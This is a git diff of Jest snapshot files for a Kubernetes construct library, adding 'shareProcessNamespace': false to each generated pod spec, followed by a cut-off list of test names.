"runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -134,6 +135,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -196,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/deployment.test.ts.snap b/test/__snapshots__/deployment.test.ts.snap index 4a656e0c..8979adee 100644 --- a/test/__snapshots__/deployment.test.ts.snap +++ b/test/__snapshots__/deployment.test.ts.snap @@ -74,6 +74,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -194,6 +195,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -293,6 +295,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -402,6 +405,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -495,6 +499,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -586,6 +591,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -676,6 +682,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -747,6 +754,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -830,6 +838,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -901,6 +910,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -981,6 +991,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1074,6 +1085,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1164,6 +1176,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1235,6 +1248,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1318,6 +1332,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1389,6 +1404,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1469,6 +1485,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1562,6 +1579,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1652,6 +1670,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1740,6 +1759,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1825,6 +1845,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -1877,6 +1898,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { @@ -2000,6 +2022,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap index c4a24c10..5381f2a1 100644 --- a/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap +++ b/test/__snapshots__/horizontal-pod-autoscaler.test.ts.snap @@ -62,6 +62,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -177,6 +178,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -305,6 +307,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -433,6 +436,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -561,6 +565,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -688,6 +693,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -815,6 +821,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -942,6 +949,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1069,6 +1077,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1196,6 +1205,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1323,6 +1333,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1450,6 +1461,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1578,6 +1590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1710,6 +1723,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1844,6 +1858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2012,6 +2027,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2146,6 +2162,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2266,6 +2283,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2394,6 +2412,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2509,6 +2528,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2633,6 +2653,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -2754,6 +2775,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2869,6 +2891,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2990,6 +3013,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "volumes": Array [ Object { diff --git a/test/__snapshots__/job.test.ts.snap b/test/__snapshots__/job.test.ts.snap index 5aca1007..106074f8 100644 --- a/test/__snapshots__/job.test.ts.snap +++ b/test/__snapshots__/job.test.ts.snap @@ -48,6 +48,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/network-policy.test.ts.snap b/test/__snapshots__/network-policy.test.ts.snap index 514e47f9..470cf8bd 100644 --- a/test/__snapshots__/network-policy.test.ts.snap +++ b/test/__snapshots__/network-policy.test.ts.snap @@ -136,6 +136,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -181,6 +182,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -267,6 +269,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -331,6 +334,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -419,6 +423,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -502,6 +507,7 @@ Array [ "runAsNonRoot": true, }, 
"setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -584,6 +590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -671,6 +678,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -766,6 +774,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -857,6 +866,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -962,6 +972,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1048,6 +1059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1135,6 +1147,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1180,6 +1193,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1266,6 +1280,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1330,6 +1345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1418,6 +1434,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1501,6 +1518,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, 
"terminationGracePeriodSeconds": 30, }, }, @@ -1583,6 +1601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1670,6 +1689,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1765,6 +1785,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1856,6 +1877,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1961,6 +1983,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2047,6 +2070,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2134,6 +2158,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2217,6 +2242,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/pod.test.ts.snap b/test/__snapshots__/pod.test.ts.snap index 137d7e68..3b173625 100644 --- a/test/__snapshots__/pod.test.ts.snap +++ b/test/__snapshots__/pod.test.ts.snap @@ -44,6 +44,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -99,6 +100,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -173,6 +175,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-291,6 +294,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -341,6 +345,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -417,6 +422,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -467,6 +473,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -543,6 +550,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -593,6 +601,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -721,6 +730,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -771,6 +781,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -847,6 +858,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -897,6 +909,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -973,6 +986,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1023,6 +1037,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1127,6 +1142,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + 
"shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1206,6 +1222,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1324,6 +1341,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1431,6 +1449,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1481,6 +1500,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1607,6 +1627,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1659,6 +1680,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1828,6 +1850,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1873,6 +1896,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -1923,6 +1947,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2034,6 +2059,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2154,6 +2180,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2204,6 +2231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-2366,6 +2394,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2478,6 +2507,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2582,6 +2612,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2661,6 +2692,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2779,6 +2811,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2896,6 +2929,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -2946,6 +2980,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3072,6 +3107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3124,6 +3160,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3293,6 +3330,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3338,6 +3376,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3388,6 +3427,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3499,6 +3539,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, 
+ "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3619,6 +3660,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3669,6 +3711,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3831,6 +3874,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -3943,6 +3987,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4011,6 +4056,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4061,6 +4107,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4155,6 +4202,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4257,6 +4305,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4351,6 +4400,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4440,6 +4490,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4490,6 +4541,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4598,6 +4650,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ 
-4760,6 +4813,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4811,6 +4865,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4881,6 +4936,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -4950,6 +5006,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5000,6 +5057,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5062,6 +5120,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5112,6 +5171,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5171,6 +5231,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5238,6 +5299,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5303,6 +5365,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5353,6 +5416,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5415,6 +5479,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5465,6 +5530,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, 
+ "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5524,6 +5590,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5591,6 +5658,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5663,6 +5731,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -5713,6 +5782,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, "tolerations": Array [ Object { diff --git a/test/__snapshots__/service.test.ts.snap b/test/__snapshots__/service.test.ts.snap index 51c9d49f..d27cc7bd 100644 --- a/test/__snapshots__/service.test.ts.snap +++ b/test/__snapshots__/service.test.ts.snap @@ -95,6 +95,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, diff --git a/test/__snapshots__/statefulset.test.ts.snap b/test/__snapshots__/statefulset.test.ts.snap index 86d6f7b3..92e3117c 100644 --- a/test/__snapshots__/statefulset.test.ts.snap +++ b/test/__snapshots__/statefulset.test.ts.snap @@ -76,6 +76,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, }, @@ -197,6 +198,7 @@ Array [ "runAsNonRoot": true, }, "setHostnameAsFQDN": false, + "shareProcessNamespace": false, "terminationGracePeriodSeconds": 30, }, },
[ "default configuration", "custom configuration", "Can be isolated", "StatefulSet gets defaults", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA 
with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "Instantiation properties are all respected", "can mount container to a pv", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", 